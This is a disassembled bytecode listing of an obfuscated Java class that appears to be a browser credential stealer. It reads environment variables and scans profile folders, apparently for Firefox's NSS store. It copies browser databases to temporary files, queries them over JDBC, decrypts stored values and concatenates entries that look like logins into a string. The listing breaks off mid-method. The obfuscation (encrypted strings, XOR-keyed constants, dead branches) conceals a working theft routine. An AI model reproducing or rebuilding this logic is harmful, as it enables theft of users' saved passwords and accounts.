Compiled from "b.java"
public class a.b.d.b {
  private static final java.lang.String F;

  private static int W;

  private static int e;

  private static int I;

  private static int B;

  private static final java.lang.String[] a;

  private static final java.lang.String[] b;

  private static final long[] c;

  private static final java.lang.Long[] d;

  public a.b.d.b();
    Code:
         0: aload_0
         1: invokespecial #32                 // Method java/lang/Object."<init>":()V
         4: return

  public static void r();
    Code:
         0: ldc2_w        #373                // long 5766274707563l
         3: lstore_0
         4: lload_0
         5: dup2
         6: ldc2_w        #383                // long 38184341823624l
         9: lxor
        10: lstore_2
        11: pop2
        12: iconst_0
        13: putstatic     #90                 // Field W:I
        16: iconst_0
        17: putstatic     #279                // Field e:I
        20: iconst_0
        21: putstatic     #118                // Field I:I
        24: iconst_0
        25: putstatic     #239                // Field B:I
        28: ldc           #17                 // int -1866305730
        30: sipush        -3441
        33: i2c
        34: ineg
        35: iadd
        36: ldc           #17                 // int -1866305730
        38: sipush        -161
        41: i2c
        42: ineg
        43: iadd
        44: lload_0
        45: l2i
        46: invokestatic  #349                // Method a:(III)Ljava/lang/String;
        49: invokestatic  #350                // Method a/b/d/dec.k:(Ljava/lang/String;)V
        52: getstatic     #214                // Field a/b/d/dec$NssSec.m:Z
        55: ldc           #17                 // int -1866305730
        57: sipush        -3424
        60: i2c
        61: ineg
        62: iadd
        63: ldc           #7                  // int -1866436800
        65: sipush        -11999
        68: i2c
        69: ineg
        70: isub
        71: lload_0
        72: l2i
        73: invokestatic  #349                // Method a:(III)Ljava/lang/String;
        76: invokestatic  #351                // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
        79: ldc           #17                 // int -1866305730
        81: sipush        -3421
        84: i2c
        85: ineg
        86: iadd
        87: ldc           #18                 // int 1866436800
        89: sipush        -20275
        92: i2c
        93: isub
        94: lload_0
        95: l2i
        96: invokestatic  #349                // Method a:(III)Ljava/lang/String;
        99: invokedynamic #326,  0            // InvokeDynamic #0:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       104: astore        5
       106: aload         5
       108: ldc           #17                 // int -1866305730
       110: sipush        -3428
       113: i2c
       114: ineg
       115: iadd
       116: ldc           #7                  // int -1866436800
       118: sipush        -27810
       121: i2c
       122: ineg
       123: isub
       124: lload_0
       125: l2i
       126: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       129: invokestatic  #303                // Method a/b/d/dec.g:(Ljava/lang/String;Ljava/lang/String;)V
       132: lload_2
       133: aload         5
       135: iconst_2
       136: anewarray     #47                 // class java/lang/Object
       139: dup_x1
       140: swap
       141: iconst_1
       142: swap
       143: aastore
       144: dup_x2
       145: dup_x2
       146: pop
       147: invokestatic  #227                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       150: iconst_0
       151: swap
       152: aastore
       153: invokestatic  #168                // Method d:([Ljava/lang/Object;)V
       156: ldc           #17                 // int -1866305730
       158: sipush        -3403
       161: i2c
       162: ineg
       163: iadd
       164: ldc           #18                 // int 1866436800
       166: sipush        -8884
       169: i2c
       170: isub
       171: lload_0
       172: l2i
       173: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       176: ldc           #17                 // int -1866305730
       178: sipush        -3455
       181: i2c
       182: ineg
       183: iadd
       184: ldc           #7                  // int -1866436800
       186: sipush        -7926
       189: i2c
       190: ineg
       191: isub
       192: lload_0
       193: l2i
       194: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       197: getstatic     #90                 // Field W:I
       200: invokestatic  #207                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       203: istore        4
       205: ldc           #17                 // int -1866305730
       207: sipush        -3426
       210: i2c
       211: ineg
       212: iadd
       213: ldc           #18                 // int 1866436800
       215: sipush        -2307
       218: i2c
       219: isub
       220: lload_0
       221: l2i
       222: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       225: ldc           #17                 // int -1866305730
       227: sipush        -3415
       230: i2c
       231: ineg
       232: iadd
       233: ldc           #7                  // int -1866436800
       235: sipush        -18564
       238: i2c
       239: ineg
       240: isub
       241: lload_0
       242: l2i
       243: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       246: getstatic     #279                // Field e:I
       249: invokestatic  #207                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       252: ldc           #17                 // int -1866305730
       254: sipush        -3426
       257: i2c
       258: ineg
       259: iadd
       260: ldc           #18                 // int 1866436800
       262: sipush        -2307
       265: i2c
       266: isub
       267: lload_0
       268: l2i
       269: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       272: ldc           #17                 // int -1866305730
       274: sipush        -3416
       277: i2c
       278: ineg
       279: iadd
       280: ldc           #18                 // int 1866436800
       282: sipush        -14872
       285: i2c
       286: isub
       287: lload_0
       288: l2i
       289: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       292: getstatic     #118                // Field I:I
       295: invokestatic  #207                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       298: ldc           #17                 // int -1866305730
       300: sipush        -3426
       303: i2c
       304: ineg
       305: iadd
       306: ldc           #18                 // int 1866436800
       308: sipush        -2307
       311: i2c
       312: isub
       313: lload_0
       314: l2i
       315: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       318: ldc           #17                 // int -1866305730
       320: sipush        -3417
       323: i2c
       324: ineg
       325: iadd
       326: ldc           #18                 // int 1866436800
       328: sipush        -12429
       331: i2c
       332: isub
       333: lload_0
       334: l2i
       335: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       338: getstatic     #239                // Field B:I
       341: invokestatic  #207                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       344: getstatic     #154                // Field a/b/d/dec.V:I
       347: ifeq          363
       350: iload         4
       352: ifeq          359
       355: iconst_0
       356: goto          360
       359: iconst_1
       360: putstatic     #214                // Field a/b/d/dec$NssSec.m:Z
       363: return

  private static void d(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #94                 // class java/lang/Long
         7: invokevirtual #318                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #325                // class java/lang/String
        17: astore_3
        18: pop
        19: lload_1
        20: dup2
        21: ldc2_w        #379                // long 102457856476860l
        24: lxor
        25: lstore        4
        27: pop2
        28: getstatic     #214                // Field a/b/d/dec$NssSec.m:Z
        31: new           #272                // class java/io/File
        34: dup
        35: aload_3
        36: invokespecial #278                // Method java/io/File."<init>":(Ljava/lang/String;)V
        39: astore        7
        41: istore        6
        43: aload         7
        45: iload         6
        47: ifne          64
        50: invokevirtual #28                 // Method java/io/File.exists:()Z
        53: ifne          62
        56: goto          60
        59: athrow
        60: return
        61: athrow
        62: aload         7
        64: invokevirtual #202                // Method java/io/File.listFiles:()[Ljava/io/File;
        67: astore        8
        69: aload         8
        71: iload         6
        73: ifne          86
        76: ifnonnull     84
        79: goto          83
        82: athrow
        83: return
        84: aload         8
        86: astore        9
        88: aload         9
        90: arraylength
        91: istore        10
        93: iconst_0
        94: istore        11
        96: iload         11
        98: iload         10
       100: if_icmpge     285
       103: aload         9
       105: iload         11
       107: aaload
       108: astore        12
       110: iload         6
       112: lload_1
       113: lconst_0
       114: lcmp
       115: ifle          282
       118: ifne          280
       121: aload         12
       123: invokevirtual #40                 // Method java/io/File.isDirectory:()Z
       126: ifeq          277
       129: goto          133
       132: athrow
       133: aload         12
       135: iload         6
       137: ifne          233
       140: goto          144
       143: athrow
       144: lload_1
       145: lconst_0
       146: lcmp
       147: ifle          229
       150: invokevirtual #195                // Method java/io/File.getName:()Ljava/lang/String;
       153: ldc           #12                 // int -320859360
       155: sipush        -2287
       158: isub
       159: ldc           #9                  // int 320859360
       161: sipush        27643
       164: isub
       165: lload_1
       166: l2i
       167: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       170: invokevirtual #298                // Method java/lang/String.equals:(Ljava/lang/Object;)Z
       173: ifne          227
       176: goto          180
       179: athrow
       180: lload_1
       181: lconst_0
       182: lcmp
       183: ifle          272
       186: aload         12
       188: iload         6
       190: ifne          233
       193: goto          197
       196: athrow
       197: invokevirtual #195                // Method java/io/File.getName:()Ljava/lang/String;
       200: ldc           #12                 // int -320859360
       202: sipush        -2277
       205: isub
       206: ldc           #12                 // int -320859360
       208: sipush        -26156
       211: isub
       212: lload_1
       213: l2i
       214: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       217: invokevirtual #353                // Method java/lang/String.startsWith:(Ljava/lang/String;)Z
       220: ifeq          277
       223: goto          227
       226: athrow
       227: aload         12
       229: goto          233
       232: athrow
       233: lload         4
       235: dup2_x1
       236: pop2
       237: iconst_2
       238: anewarray     #47                 // class java/lang/Object
       241: dup_x1
       242: swap
       243: iconst_1
       244: swap
       245: aastore
       246: dup_x2
       247: dup_x2
       248: pop
       249: invokestatic  #227                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       252: iconst_0
       253: swap
       254: aastore
       255: invokestatic  #113                // Method m:([Ljava/lang/Object;)V
       258: sipush        5138
       261: ldc2_w        #369                // long 978136984950917253l
       264: lload_1
       265: lxor
       266: invokestatic  #346                // Method a:(IJ)J
       269: invokestatic  #263                // Method java/lang/Thread.sleep:(J)V
       272: goto          277
       275: astore        13
       277: iinc          11, 1
       280: iload         6
       282: ifeq          96
       285: return
      Exception table:
         from    to  target type
           197   229   232   Class java/lang/Exception
           180   223   226   Class java/lang/Exception
           144   193   196   Class java/lang/Exception
           133   176   179   Class java/lang/Exception
           121   140   143   Class java/lang/Exception
           110   129   132   Class java/lang/Exception
            69    79    82   Class java/lang/Exception
            50    61    61   Class java/lang/Exception
            43    56    59   Class java/lang/Exception
           258   272   275   Class java/lang/Exception

  private static void m(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #94                 // class java/lang/Long
         7: invokevirtual #318                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #272                // class java/io/File
        17: astore_3
        18: pop
        19: lload_1
        20: dup2
        21: ldc2_w        #377                // long 131731694023463l
        24: lxor
        25: lstore        4
        27: pop2
        28: getstatic     #214                // Field a/b/d/dec$NssSec.m:Z
        31: aload_3
        32: invokevirtual #195                // Method java/io/File.getName:()Ljava/lang/String;
        35: astore        7
        37: istore        6
        39: new           #272                // class java/io/File
        42: dup
        43: aload_3
        44: ldc           #14                 // int -1195096260
        46: sipush        -27823
        49: iadd
        50: ldc           #14                 // int -1195096260
        52: sipush        -30861
        55: i2c
        56: ineg
        57: iadd
        58: lload_1
        59: l2i
        60: invokestatic  #349                // Method a:(III)Ljava/lang/String;
        63: invokespecial #29                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        66: iload         6
        68: ifne          603
        71: invokevirtual #28                 // Method java/io/File.exists:()Z
        74: ifne          156
        77: new           #272                // class java/io/File
        80: dup
        81: aload_3
        82: ldc           #14                 // int -1195096260
        84: sipush        -27821
        87: iadd
        88: ldc           #14                 // int -1195096260
        90: sipush        -26080
        93: iadd
        94: lload_1
        95: l2i
        96: invokestatic  #349                // Method a:(III)Ljava/lang/String;
        99: invokespecial #29                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       102: iload         6
       104: ifne          603
       107: invokevirtual #28                 // Method java/io/File.exists:()Z
       110: ifne          156
       113: new           #272                // class java/io/File
       116: dup
       117: aload_3
       118: ldc           #14                 // int -1195096260
       120: sipush        -27820
       123: iadd
       124: ldc           #10                 // int 1195096260
       126: sipush        28060
       129: iadd
       130: lload_1
       131: l2i
       132: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       135: invokespecial #29                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       138: iload         6
       140: lload_1
       141: lconst_0
       142: lcmp
       143: ifle          609
       146: ifne          603
       149: invokevirtual #28                 // Method java/io/File.exists:()Z
       152: ifne          156
       155: return
       156: aload_3
       157: ldc           #14                 // int -1195096260
       159: sipush        -27797
       162: iadd
       163: ldc           #14                 // int -1195096260
       165: sipush        -27092
       168: iadd
       169: lload_1
       170: l2i
       171: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       174: ldc           #14                 // int -1195096260
       176: sipush        -27815
       179: iadd
       180: ldc           #10                 // int 1195096260
       182: sipush        -21619
       185: i2c
       186: iadd
       187: lload_1
       188: l2i
       189: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       192: aload         7
       194: lload         4
       196: ldc           #14                 // int -1195096260
       198: sipush        -27810
       201: iadd
       202: ldc           #10                 // int 1195096260
       204: sipush        -22714
       207: i2c
       208: iadd
       209: lload_1
       210: l2i
       211: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       214: iconst_1
       215: bipush        7
       217: anewarray     #47                 // class java/lang/Object
       220: dup_x1
       221: swap
       222: invokestatic  #290                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       225: bipush        6
       227: swap
       228: aastore
       229: dup_x1
       230: swap
       231: iconst_5
       232: swap
       233: aastore
       234: dup_x2
       235: dup_x2
       236: pop
       237: invokestatic  #227                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       240: iconst_4
       241: swap
       242: aastore
       243: dup_x1
       244: swap
       245: iconst_3
       246: swap
       247: aastore
       248: dup_x1
       249: swap
       250: iconst_2
       251: swap
       252: aastore
       253: dup_x1
       254: swap
       255: iconst_1
       256: swap
       257: aastore
       258: dup_x1
       259: swap
       260: iconst_0
       261: swap
       262: aastore
       263: invokestatic  #100                // Method H:([Ljava/lang/Object;)V
       266: aload_3
       267: ldc           #14                 // int -1195096260
       269: sipush        -27792
       272: iadd
       273: ldc           #14                 // int -1195096260
       275: sipush        -31548
       278: i2c
       279: ineg
       280: iadd
       281: lload_1
       282: l2i
       283: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       286: ldc           #14                 // int -1195096260
       288: sipush        -27807
       291: iadd
       292: ldc           #14                 // int -1195096260
       294: sipush        -25299
       297: i2c
       298: ineg
       299: iadd
       300: lload_1
       301: l2i
       302: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       305: aload         7
       307: lload         4
       309: ldc           #14                 // int -1195096260
       311: sipush        -27834
       314: iadd
       315: ldc           #14                 // int -1195096260
       317: sipush        -24534
       320: i2c
       321: ineg
       322: iadd
       323: lload_1
       324: l2i
       325: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       328: iconst_2
       329: bipush        7
       331: anewarray     #47                 // class java/lang/Object
       334: dup_x1
       335: swap
       336: invokestatic  #290                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       339: bipush        6
       341: swap
       342: aastore
       343: dup_x1
       344: swap
       345: iconst_5
       346: swap
       347: aastore
       348: dup_x2
       349: dup_x2
       350: pop
       351: invokestatic  #227                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       354: iconst_4
       355: swap
       356: aastore
       357: dup_x1
       358: swap
       359: iconst_3
       360: swap
       361: aastore
       362: dup_x1
       363: swap
       364: iconst_2
       365: swap
       366: aastore
       367: dup_x1
       368: swap
       369: iconst_1
       370: swap
       371: aastore
       372: dup_x1
       373: swap
       374: iconst_0
       375: swap
       376: aastore
       377: invokestatic  #100                // Method H:([Ljava/lang/Object;)V
       380: aload_3
       381: ldc           #14                 // int -1195096260
       383: sipush        -27783
       386: iadd
       387: ldc           #14                 // int -1195096260
       389: sipush        -19001
       392: i2c
       393: ineg
       394: iadd
       395: lload_1
       396: l2i
       397: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       400: ldc           #14                 // int -1195096260
       402: sipush        -27776
       405: iadd
       406: ldc           #10                 // int 1195096260
       408: sipush        -29757
       411: i2c
       412: iadd
       413: lload_1
       414: l2i
       415: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       418: aload         7
       420: lload         4
       422: ldc           #14                 // int -1195096260
       424: sipush        -27818
       427: iadd
       428: ldc           #10                 // int 1195096260
       430: sipush        19595
       433: iadd
       434: lload_1
       435: l2i
       436: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       439: iconst_3
       440: bipush        7
       442: anewarray     #47                 // class java/lang/Object
       445: dup_x1
       446: swap
       447: invokestatic  #290                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       450: bipush        6
       452: swap
       453: aastore
       454: dup_x1
       455: swap
       456: iconst_5
       457: swap
       458: aastore
       459: dup_x2
       460: dup_x2
       461: pop
       462: invokestatic  #227                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       465: iconst_4
       466: swap
       467: aastore
       468: dup_x1
       469: swap
       470: iconst_3
       471: swap
       472: aastore
       473: dup_x1
       474: swap
       475: iconst_2
       476: swap
       477: aastore
       478: dup_x1
       479: swap
       480: iconst_1
       481: swap
       482: aastore
       483: dup_x1
       484: swap
       485: iconst_0
       486: swap
       487: aastore
       488: invokestatic  #100                // Method H:([Ljava/lang/Object;)V
       491: aload_3
       492: ldc           #14                 // int -1195096260
       494: sipush        -27796
       497: iadd
       498: ldc           #14                 // int -1195096260
       500: sipush        -22861
       503: i2c
       504: ineg
       505: iadd
       506: lload_1
       507: l2i
       508: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       511: ldc           #14                 // int -1195096260
       513: sipush        -27826
       516: iadd
       517: ldc           #10                 // int 1195096260
       519: sipush        -21575
       522: i2c
       523: iadd
       524: lload_1
       525: l2i
       526: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       529: aload         7
       531: lload         4
       533: ldc           #14                 // int -1195096260
       535: sipush        -27781
       538: iadd
       539: ldc           #10                 // int 1195096260
       541: sipush        23296
       544: iadd
       545: lload_1
       546: l2i
       547: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       550: iconst_5
       551: bipush        7
       553: anewarray     #47                 // class java/lang/Object
       556: dup_x1
       557: swap
       558: invokestatic  #290                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       561: bipush        6
       563: swap
       564: aastore
       565: dup_x1
       566: swap
       567: iconst_5
       568: swap
       569: aastore
       570: dup_x2
       571: dup_x2
       572: pop
       573: invokestatic  #227                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       576: iconst_4
       577: swap
       578: aastore
       579: dup_x1
       580: swap
       581: iconst_3
       582: swap
       583: aastore
       584: dup_x1
       585: swap
       586: iconst_2
       587: swap
       588: aastore
       589: dup_x1
       590: swap
       591: iconst_1
       592: swap
       593: aastore
       594: dup_x1
       595: swap
       596: iconst_0
       597: swap
       598: aastore
       599: invokestatic  #100                // Method H:([Ljava/lang/Object;)V
       602: aload_3
       603: ldc           #14                 // int -1195096260
       605: sipush        -27812
       608: iadd
       609: ldc           #10                 // int 1195096260
       611: sipush        -25776
       614: i2c
       615: iadd
       616: lload_1
       617: l2i
       618: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       621: ldc           #14                 // int -1195096260
       623: sipush        -27786
       626: iadd
       627: ldc           #14                 // int -1195096260
       629: sipush        -25047
       632: iadd
       633: lload_1
       634: l2i
       635: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       638: aload         7
       640: lload         4
       642: ldc           #14                 // int -1195096260
       644: sipush        -27805
       647: iadd
       648: ldc           #10                 // int 1195096260
       650: sipush        -29140
       653: i2c
       654: iadd
       655: lload_1
       656: l2i
       657: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       660: iconst_4
       661: bipush        7
       663: anewarray     #47                 // class java/lang/Object
       666: dup_x1
       667: swap
       668: invokestatic  #290                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       671: bipush        6
       673: swap
       674: aastore
       675: dup_x1
       676: swap
       677: iconst_5
       678: swap
       679: aastore
       680: dup_x2
       681: dup_x2
       682: pop
       683: invokestatic  #227                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       686: iconst_4
       687: swap
       688: aastore
       689: dup_x1
       690: swap
       691: iconst_3
       692: swap
       693: aastore
       694: dup_x1
       695: swap
       696: iconst_2
       697: swap
       698: aastore
       699: dup_x1
       700: swap
       701: iconst_1
       702: swap
       703: aastore
       704: dup_x1
       705: swap
       706: iconst_0
       707: swap
       708: aastore
       709: invokestatic  #100                // Method H:([Ljava/lang/Object;)V
       712: return

  private static void H(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #272                // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #325                // class java/lang/String
        14: astore_2
        15: dup
        16: iconst_2
        17: aaload
        18: checkcast     #325                // class java/lang/String
        21: astore_3
        22: dup
        23: iconst_3
        24: aaload
        25: checkcast     #325                // class java/lang/String
        28: astore        4
        30: dup
        31: iconst_4
        32: aaload
        33: checkcast     #94                 // class java/lang/Long
        36: invokevirtual #318                // Method java/lang/Long.longValue:()J
        39: lstore        5
        41: dup
        42: iconst_5
        43: aaload
        44: checkcast     #325                // class java/lang/String
        47: astore        7
        49: dup
        50: bipush        6
        52: aaload
        53: checkcast     #73                 // class java/lang/Integer
        56: invokevirtual #285                // Method java/lang/Integer.intValue:()I
        59: istore        8
        61: pop
        62: getstatic     #214                // Field a/b/d/dec$NssSec.m:Z
        65: new           #272                // class java/io/File
        68: dup
        69: aload_1
        70: aload_2
        71: invokespecial #29                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        74: astore        10
        76: istore        9
        78: aload         10
        80: invokevirtual #28                 // Method java/io/File.exists:()Z
        83: iload         9
        85: ifne          156
        88: ifne          142
        91: goto          95
        94: athrow
        95: iload         8
        97: iload         9
        99: ifne          156
       102: goto          106
       105: athrow
       106: iconst_2
       107: if_icmpne     142
       110: goto          114
       113: athrow
       114: new           #272                // class java/io/File
       117: dup
       118: aload_1
       119: ldc           #4                  // int -1810863120
       121: sipush        -17007
       124: iadd
       125: ldc           #19                 // int 1810863120
       127: sipush        26149
       130: iadd
       131: lload         5
       133: l2i
       134: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       137: invokespecial #29                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       140: astore        10
       142: aload         10
       144: iload         9
       146: ifne          194
       149: invokevirtual #28                 // Method java/io/File.exists:()Z
       152: goto          156
       155: athrow
       156: ifne          160
       159: return
       160: new           #272                // class java/io/File
       163: dup
       164: ldc           #4                  // int -1810863120
       166: sipush        -16998
       169: iadd
       170: ldc           #4                  // int -1810863120
       172: sipush        -9050
       175: iadd
       176: lload         5
       178: l2i
       179: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       182: invokestatic  #79                 // Method java/lang/System.getProperty:(Ljava/lang/String;)Ljava/lang/String;
       185: invokestatic  #115                // Method java/util/UUID.randomUUID:()Ljava/util/UUID;
       188: invokevirtual #141                // Method java/util/UUID.toString:()Ljava/lang/String;
       191: invokespecial #96                 // Method java/io/File."<init>":(Ljava/lang/String;Ljava/lang/String;)V
       194: astore        11
       196: aload         10
       198: iload         9
       200: ifne          245
       203: aload         11
       205: ldc           #4                  // int -1810863120
       207: sipush        -16961
       210: iadd
       211: ldc           #19                 // int 1810863120
       213: sipush        24769
       216: iadd
       217: lload         5
       219: l2i
       220: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       223: invokestatic  #310                // Method a/b/d/dec.cp:(Ljava/io/File;Ljava/io/File;Ljava/lang/String;)Z
       226: lload         5
       228: lconst_0
       229: lcmp
       230: ifle          241
       233: ifne          243
       236: aload         11
       238: invokevirtual #144                // Method java/io/File.delete:()Z
       241: pop
       242: return
       243: aload         11
       245: invokevirtual #232                // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       248: ldc           #4                  // int -1810863120
       250: sipush        -17005
       253: iadd
       254: ldc           #4                  // int -1810863120
       256: sipush        -16990
       259: iadd
       260: lload         5
       262: l2i
       263: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       266: swap
       267: invokedynamic #133,  0            // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       272: invokestatic  #148                // Method java/sql/DriverManager.getConnection:(Ljava/lang/String;)Ljava/sql/Connection;
       275: astore        12
       277: aload         12
       279: invokeinterface #341,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       284: astore        13
       286: aload         13
       288: aload_3
       289: invokeinterface #311,  2          // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       294: astore        14
       296: new           #173                // class java/lang/StringBuilder
       299: dup
       300: invokespecial #213                // Method java/lang/StringBuilder."<init>":()V
       303: astore        15
       305: iload         8
       307: iconst_5
       308: iload         9
       310: ifne          850
       313: if_icmpne     834
       316: goto          320
       319: athrow
       320: new           #280                // class java/util/HashMap
       323: dup
       324: invokespecial #342                // Method java/util/HashMap."<init>":()V
       327: astore        16
       329: aload         12
       331: invokeinterface #341,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       336: ldc           #4                  // int -1810863120
       338: sipush        -16951
       341: iadd
       342: ldc           #4                  // int -1810863120
       344: sipush        -18413
       347: iadd
       348: lload         5
       350: l2i
       351: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       354: invokeinterface #311,  2          // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       359: astore        17
       361: aload         17
       363: invokeinterface #111,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       368: ifeq          441
       371: aload         17
       373: iconst_2
       374: invokeinterface #306,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       379: invokestatic  #190                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       382: astore        18
       384: aload         18
       386: iload         9
       388: lload         5
       390: lconst_0
       391: lcmp
       392: ifle          400
       395: ifne          1823
       398: iload         9
       400: ifne          435
       403: goto          407
       406: athrow
       407: ifnull        436
       410: goto          414
       413: athrow
       414: aload         16
       416: aload         17
       418: iconst_1
       419: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       424: aload         18
       426: invokeinterface #124,  3          // InterfaceMethod java/util/Map.put:(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
       431: goto          435
       434: athrow
       435: pop
       436: iload         9
       438: ifeq          361
       441: lload         5
       443: lconst_0
       444: lcmp
       445: iflt          476
       448: aload         17
       450: iload         9
       452: lload         5
       454: lconst_0
       455: lcmp
       456: iflt          374
       459: ifne          471
       462: ifnull        524
       465: goto          469
       468: athrow
       469: aload         17
       471: invokeinterface #92,  1           // InterfaceMethod java/sql/ResultSet.close:()V
       476: goto          524
       479: astore        18
       481: lload         5
       483: lconst_0
       484: lcmp
       485: ifle          509
       488: aload         17
       490: iload         9
       492: ifne          504
       495: ifnull        521
       498: goto          502
       501: athrow
       502: aload         17
       504: invokeinterface #92,  1           // InterfaceMethod java/sql/ResultSet.close:()V
       509: goto          521
       512: astore        19
       514: aload         18
       516: aload         19
       518: invokevirtual #176                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
       521: aload         18
       523: athrow
       524: goto          529
       527: astore        17
       529: aload         14
       531: invokeinterface #111,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       536: ifeq          815
       539: aload         14
       541: iconst_5
       542: invokeinterface #306,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       547: invokestatic  #190                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       550: astore        17
       552: iload         9
       554: lload         5
       556: lconst_0
       557: lcmp
       558: iflt          734
       561: ifne          712
       564: aload         17
       566: iload         9
       568: ifne          1823
       571: goto          575
       574: athrow
       575: ifnull        810
       578: goto          582
       581: athrow
       582: getstatic     #239                // Field B:I
       585: iconst_1
       586: iadd
       587: putstatic     #239                // Field B:I
       590: aload         15
       592: ldc           #4                  // int -1810863120
       594: sipush        -16954
       597: iadd
       598: ldc           #4                  // int -1810863120
       600: sipush        -7847
       603: iadd
       604: lload         5
       606: l2i
       607: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       610: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       613: aload         14
       615: iconst_2
       616: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       621: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       624: ldc           #4                  // int -1810863120
       626: sipush        -16949
       629: iadd
       630: ldc           #4                  // int -1810863120
       632: sipush        -21223
       635: iadd
       636: lload         5
       638: l2i
       639: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       642: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       645: aload         17
       647: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       650: ldc           #4                  // int -1810863120
       652: sipush        -16965
       655: iadd
       656: ldc           #4                  // int -1810863120
       658: sipush        -13541
       661: iadd
       662: lload         5
       664: l2i
       665: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       668: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       671: aload         14
       673: iconst_3
       674: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       679: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       682: ldc           #3                  // String /
       684: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
